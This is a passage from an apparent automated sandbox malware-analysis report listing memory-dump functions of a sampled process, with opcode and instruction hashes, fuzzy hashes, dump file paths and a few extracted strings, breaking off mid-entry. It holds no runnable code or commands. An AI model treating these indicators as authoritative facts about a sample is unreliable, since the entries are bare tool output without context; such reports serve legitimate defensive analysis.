                                                                              • Instruction ID: bc7fc3df29fc7c84e2c90f0a358e78fbdb3a00d90dbecb109e4412185eb33bc2
                                                                              • Opcode Fuzzy Hash: bd4a7e227afdef288c9bb2abb82389760494954e1bb238a4c5c3bf1d3d803a12
                                                                              • Instruction Fuzzy Hash: 6B0180B7B002183BDB10AAA4DC49DEF736CDF55610F00025AFE189B241FA70AE51CAE5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 403 569eb3f-569eba1 call 5679cef 406 569ebcb-569ebd2 403->406 407 569eba3-569eba8 call 56a2fdf 403->407 409 569ebad-569ebca call 5679c9f 407->409
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 2r
                                                                              • API String ID: 0-312628894
                                                                              • Opcode ID: 6699dae0c0d9e32d835bdd62bae12d4c8046b5eadb805dc68ab2316f4978cf54
                                                                              • Instruction ID: ae0e3de41d00ba4020516f9f1a6dcfc8f5e7aa707abd3863003e008409701fc7
                                                                              • Opcode Fuzzy Hash: 6699dae0c0d9e32d835bdd62bae12d4c8046b5eadb805dc68ab2316f4978cf54
                                                                              • Instruction Fuzzy Hash: 4B11C8B2E0121CAF8F40DFE9D9419EEBBF8FB48210F04456AE919E7200E7705A458BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 84661d50689481592566b5dc9db70cee70d2dca93545d82059dede3c95563d74
                                                                              • Instruction ID: 1a70bfaf83472e84abd7b53cf749a1f11db8a83bd44766c1a2303cb26f528132
                                                                              • Opcode Fuzzy Hash: 84661d50689481592566b5dc9db70cee70d2dca93545d82059dede3c95563d74
                                                                              • Instruction Fuzzy Hash: E341EFB1D11219AFDB04DF99CC85AEEBBBCEF49710F10415AF914E6240E7B19A41CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                                                              • Instruction ID: 146ab206241048459efd4d6a8bf67cf1b834214001159e4a9c2c246f07f35bc7
                                                                              • Opcode Fuzzy Hash: cb7fa5642adef2e60d2b04cf313a2cdc583469e5c42a9b56a82cbefba5456746
                                                                              • Instruction Fuzzy Hash: 2221CCB2200608BBDB14DF99DC85EEB73AEAB8C714F108208FA1993240D630AD51CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a084638cc5bd1189a281151c337264f456d798bebb9180318e8be5ec155b7cf6
                                                                              • Instruction ID: c6f8c5c08bd503d697064b0edede7658252732d7394d0e79b4ffad651aeac730
                                                                              • Opcode Fuzzy Hash: a084638cc5bd1189a281151c337264f456d798bebb9180318e8be5ec155b7cf6
                                                                              • Instruction Fuzzy Hash: BC21DFB2210608BBDB14DF99DC80EEB73EEAF8C714F108608FA5997244D630ED51CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                                                              • Instruction ID: 6e13cfcfbb7f67f915fcb23a31bb96376c4dcad9583d6d6ea5ab7ec3682be74a
                                                                              • Opcode Fuzzy Hash: 6c2950231a5173a1373c7449ca6bba4f1f5f517c15ada156b9eb2e86a673e209
                                                                              • Instruction Fuzzy Hash: 9521C2B2200609AFDB14DF99DC85EEB77EDAF8D714F108608FA58A7244D630AD51CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6f2c0fb8cf0499ceb4cfc0f99b6ab82537d12237ab019f4a70d6710591926b7
                                                                              • Instruction ID: 471ef78363d3d553a8a4b9c73f5e6fd6f96509a7a676fe1155168e674b2d8786
                                                                              • Opcode Fuzzy Hash: b6f2c0fb8cf0499ceb4cfc0f99b6ab82537d12237ab019f4a70d6710591926b7
                                                                              • Instruction Fuzzy Hash: A71173B23802057BF720AA558C46FAB375D9B85F15F244019FB08AE2C1D6B5FC11C6B8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0b6e36345d6d186789615dcaa2aa807188a74875ec8ccbac9e74efb910ee4807
                                                                              • Instruction ID: c1e7583fc3be24f49044fbded05605cc4a42a575f5ee3c368bec3ff73c9c85c2
                                                                              • Opcode Fuzzy Hash: 0b6e36345d6d186789615dcaa2aa807188a74875ec8ccbac9e74efb910ee4807
                                                                              • Instruction Fuzzy Hash: EC1186B3F401087BEB14D6989CC5F7EB3ACDB85A20F14029AF904DF640E6616D11D6A6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 75cf4f51c64d9e556c459ac0b4c5f81be23694b24f377be35e38a8073b22ce21
                                                                              • Instruction ID: b10ee7b7a58025ec910d9df3920f4946f122914105668b745a2900c84ca261c2
                                                                              • Opcode Fuzzy Hash: 75cf4f51c64d9e556c459ac0b4c5f81be23694b24f377be35e38a8073b22ce21
                                                                              • Instruction Fuzzy Hash: 321114B6200609BFDB14EF99DC84EAB73EDEF89714F10860CFA1893244D671AD11CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e1d54319498b62e8d8c634560093dc092199a527d25698bc89fb93881df5bca
                                                                              • Instruction ID: 927775c60613e12f80ef2dfadacf2512dc968a8d379baba380a5de1878e5e428
                                                                              • Opcode Fuzzy Hash: 7e1d54319498b62e8d8c634560093dc092199a527d25698bc89fb93881df5bca
                                                                              • Instruction Fuzzy Hash: 6B1136B2200609BBD714EE98DC85EAB73ADEFC9B14F10850CFA1897240D670BD11CBB5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 70191b18ddeee0992487b9b0de406fa081dbbf8abe44dc7aea2e4948f69489d0
                                                                              • Instruction ID: e20ec3cda8b5feacd669ef845581b58870ad69f59cb6c7be7081b596b25fef9a
                                                                              • Opcode Fuzzy Hash: 70191b18ddeee0992487b9b0de406fa081dbbf8abe44dc7aea2e4948f69489d0
                                                                              • Instruction Fuzzy Hash: E0017C722002487FE610AA59CC89FBB73ADEF85714F00440DFA1897240D7717E00CBB5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 99262771c5afc88146f1963ad2d4d073f983558a83bad6119bb94b0f114c9f15
                                                                              • Instruction ID: 60836441a4926b31f030ccdb19a895392a78b09f7e2d3aed8bb839923e91a230
                                                                              • Opcode Fuzzy Hash: 99262771c5afc88146f1963ad2d4d073f983558a83bad6119bb94b0f114c9f15
                                                                              • Instruction Fuzzy Hash: DA017C72200208BBE611AB69CC49FBB73ADEFC5714F10840DF95857240D6707E00CBB4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 85ff2d744f30517628d6e7c56ce856a60e0562f16e0b8cfd3d325af531bade8a
                                                                              • Instruction ID: 902bf2b7ebeb6189c6aab1c3a5c7757762dfd72c8a0ae60113bf523c5a9bf330
                                                                              • Opcode Fuzzy Hash: 85ff2d744f30517628d6e7c56ce856a60e0562f16e0b8cfd3d325af531bade8a
                                                                              • Instruction Fuzzy Hash: 4B11B7B1D21229AF8B40DFADD88459EBBF8FB09620F10826BE818E7200D3709651CFD4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                                                              • Instruction ID: ed76d706a450f6f122733ccf27bee6d6c00583e51767ecff03c635913e1b413b
                                                                              • Opcode Fuzzy Hash: 04b48f43fc5177540e630cbbd7d3b3b4406bd591564a80cc7aed67d0a246ed7b
                                                                              • Instruction Fuzzy Hash: 2501C0B2204208BBCB04DE89DC84EEB77ADAF8C714F108608BA09E3244D630FC518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 68cfd4885f525dbabd0ef0188a43432c58d7afcd862ff37b1c0602896ed78c99
                                                                              • Instruction ID: 7fbcb2b9769672f17473a046610596d0a1dcea492df67167f5e88f5b8c192ac3
                                                                              • Opcode Fuzzy Hash: 68cfd4885f525dbabd0ef0188a43432c58d7afcd862ff37b1c0602896ed78c99
                                                                              • Instruction Fuzzy Hash: 6B01D3B6D0121CAF8B50DFE8D8459EEBBF8AA08200F14426EE819F7200F7705A04CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d56d5f05dc0678109c07e54c5783683f3907538d130d7cd7c4c0b976c47acff4
                                                                              • Instruction ID: 82b7943acceb411455ca5fcb8ff7baee988616facb0a4259d7e4e1a61f9e57f7
                                                                              • Opcode Fuzzy Hash: d56d5f05dc0678109c07e54c5783683f3907538d130d7cd7c4c0b976c47acff4
                                                                              • Instruction Fuzzy Hash: 47F0A77361421A67EB205EADEC84B96B7DCEB85230F240222FD2DDB341E671D851C7E4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cc74fe2ba95b1553988d012e90f4c691c54383e6047600d207707c7b6e1185e8
                                                                              • Instruction ID: 39677e3332377aaeb482917d9e36f530710063e1c8db720a0415848475db6c14
                                                                              • Opcode Fuzzy Hash: cc74fe2ba95b1553988d012e90f4c691c54383e6047600d207707c7b6e1185e8
                                                                              • Instruction Fuzzy Hash: 80F0F8B6200209BBDA10EE99DC81E9B77ADEF89750F104409BA18A7245D670BD518BB4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0723dfea186a921fcb8a61edf6a652a97d275c5f22fa213a497662f81fd23ef9
                                                                              • Instruction ID: c2c70cc5c7e4e75979949b1ea80656240c05b9ce822d08918ccec3d0fdfcccc7
                                                                              • Opcode Fuzzy Hash: 0723dfea186a921fcb8a61edf6a652a97d275c5f22fa213a497662f81fd23ef9
                                                                              • Instruction Fuzzy Hash: CFE0D87310811A679B14999DDC44886F79DEB8A6303210226E82997350D9319901C2F4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b9f96d417ca0ddc047535b541fd7c6d6cb5e74d9376460b4f7e2cfec010340b4
                                                                              • Instruction ID: 5069ec4ce956b1688ccb135af0c4d104066dcd3fe88231c78030fe3ba1100c13
                                                                              • Opcode Fuzzy Hash: b9f96d417ca0ddc047535b541fd7c6d6cb5e74d9376460b4f7e2cfec010340b4
                                                                              • Instruction Fuzzy Hash: 65F0E5B1E102087AEF20BBA0ED4CE76B3FCEB0C210F000189B90CD6140E5319E84CFA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2f1ece9d584eef07493a6900f4a6cebdd0fb067a6c6a8663bbe2fa1360651768
                                                                              • Instruction ID: 6bc44dbe678d2321d744e05ace013a1f5e0919bada250bcca7040710cf78efeb
                                                                              • Opcode Fuzzy Hash: 2f1ece9d584eef07493a6900f4a6cebdd0fb067a6c6a8663bbe2fa1360651768
                                                                              • Instruction Fuzzy Hash: C5F08271D15209EBDF14DFA4D841BDDBBB9EB04320F20836EE825DB280D6349751CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                                                              • Instruction ID: 4835864f24ee6c10407e32c30b11d4e15f5cb153e7d595efcff9019b0b72f45c
                                                                              • Opcode Fuzzy Hash: ca8440063db6e4452a08d5a9e58476cc5009a3b060571a389de21d7d65b57b96
                                                                              • Instruction Fuzzy Hash: 87E0E5B62042087BD614EE99DC45EAB77ADEF89720F008819F918A7245DA71BD10CBB8
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ecc63ec7e3b8d8f7bc6ff4a8625eefd14e88c382417a072179e8e93187dbeab5
                                                                              • Instruction ID: 2613b0ced993c2998638a43feb26818d0cf32fe8fc0f15dcfd839327f85b82a2
                                                                              • Opcode Fuzzy Hash: ecc63ec7e3b8d8f7bc6ff4a8625eefd14e88c382417a072179e8e93187dbeab5
                                                                              • Instruction Fuzzy Hash: EFE04F33B0521437D620668D9C09F97775D9BC5A60F090469FE089B341E970AD01CAE4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b172231ec0674115761186189825462b9d96fadc5a9d6ebd3b5fe153934e4f82
                                                                              • Instruction ID: 2bb523d817c1db77621cbb0732d0b6517073a52f6efc7e484315b4cb3e37c857
                                                                              • Opcode Fuzzy Hash: b172231ec0674115761186189825462b9d96fadc5a9d6ebd3b5fe153934e4f82
                                                                              • Instruction Fuzzy Hash: 2FF06571D15108ABEF18CF64D491BEDBB65EB05320F204369E815D7640D635D751C745
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                                                              • Instruction ID: 62e8a893a1fb0a293257eefc3844e4cf68750c2687a3cee6e7a65c62bb2fa690
                                                                              • Opcode Fuzzy Hash: 373865c143e049b55edfb69dcf5614b252f6e231a12f9e1cbf7606109e253f42
                                                                              • Instruction Fuzzy Hash: 90E08C762102187BD220FA6ACC45FDBB7ACDFC5710F004419FA0CAB246C6B1BD1187B4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310778192.00000000055D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_55d0000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 57a591a004dcc924423ccd578fde42443b66f183e39e3d93897fe9b787744395
                                                                              • Instruction ID: 228020dc7a45192b269c029a3e089388de6f0473ea1f825a55f8c951b0c19d0b
                                                                              • Opcode Fuzzy Hash: 57a591a004dcc924423ccd578fde42443b66f183e39e3d93897fe9b787744395
                                                                              • Instruction Fuzzy Hash: A9A012E2200141210A123430050C0172B4342C366025219089C016C1462581001A5141
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "R$-,9$.|$9V$F&$F)$Fq$G$H$Kb$Le$U$V`$W$a@$b$e$f$m$t[Kb$u$zg$}>
                                                                              • API String ID: 0-1168918428
                                                                              • Opcode ID: f462dcf41c935725fd7498650e4ea46f613c9238d917c8fb4555e3c9c7531baa
                                                                              • Instruction ID: b806dee1ef5b5913076e16f7c0a6964dfa4386ee7d1aa2349238795a1d9dca8d
                                                                              • Opcode Fuzzy Hash: f462dcf41c935725fd7498650e4ea46f613c9238d917c8fb4555e3c9c7531baa
                                                                              • Instruction Fuzzy Hash: 3832B1B0E0522DCFEB28CF49C9947DEBBB2BB89308F1081D9D1496B281D7B55A85CF45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: =
                                                                              • API String ID: 0-2322244508
                                                                              • Opcode ID: 471ace7cfaaee23a4e94a571ac14f480a657b607e9c2b50e6d4498d11a46bd3d
                                                                              • Instruction ID: d00e17779256147a8b05a70a5e0d1d9993b6779075b13513a7c7360116144da9
                                                                              • Opcode Fuzzy Hash: 471ace7cfaaee23a4e94a571ac14f480a657b607e9c2b50e6d4498d11a46bd3d
                                                                              • Instruction Fuzzy Hash: 7E91F3B290034DAFCB18DBA4CC84FEE77BCBF55308F44456DA609AB141D7756608CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 057d4b36e55623e7d7f25553817c573f04c319dd1b5f3c965c0599a8b4005511
                                                                              • Instruction ID: a8e4b51d5b48154e8264078b6119c1c84e1111c12abb152bf08925579dbfd4ea
                                                                              • Opcode Fuzzy Hash: 057d4b36e55623e7d7f25553817c573f04c319dd1b5f3c965c0599a8b4005511
                                                                              • Instruction Fuzzy Hash: 88E1B0B2D00219EFDF6ADFA4CC81BEEB7BCAF54304F04815EE919A6140E7716654CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4de270c8d6a6d243ce9ae1d3c366c26c8749a0c9a5f9fd0a8abe988121008cab
                                                                              • Instruction ID: 942c62c7bef11e6af2a6f1c25a54f556ac99a5f10335b6c88449acbc63e4c91a
                                                                              • Opcode Fuzzy Hash: 4de270c8d6a6d243ce9ae1d3c366c26c8749a0c9a5f9fd0a8abe988121008cab
                                                                              • Instruction Fuzzy Hash: 9771AFB1C00219AFEF69DFA4CC41FEEB7BCAF54208F04459DE919A2140EB715659CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6d12660c8d6394e72435da265a6cd9030075271806ba74e5d5ebc2d18262edc7
                                                                              • Instruction ID: 54c40980fbfb5c6dd8d4263bbbaa973ae15568eef50abcacfa4cbbb5bcb18024
                                                                              • Opcode Fuzzy Hash: 6d12660c8d6394e72435da265a6cd9030075271806ba74e5d5ebc2d18262edc7
                                                                              • Instruction Fuzzy Hash: E6E01A75E056018FD718CF48E444BA5FBE0FBD2316F1992BAD5086B211D3725150CA45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.3310155904.0000000001100000.00000040.80000000.00040000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_1100000_lgoTSqyYpvNuVXUkRnDp.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3085c71337c3c83c5fc881b3bf258d66f337ed8905adb6d51428b123baf3ef37
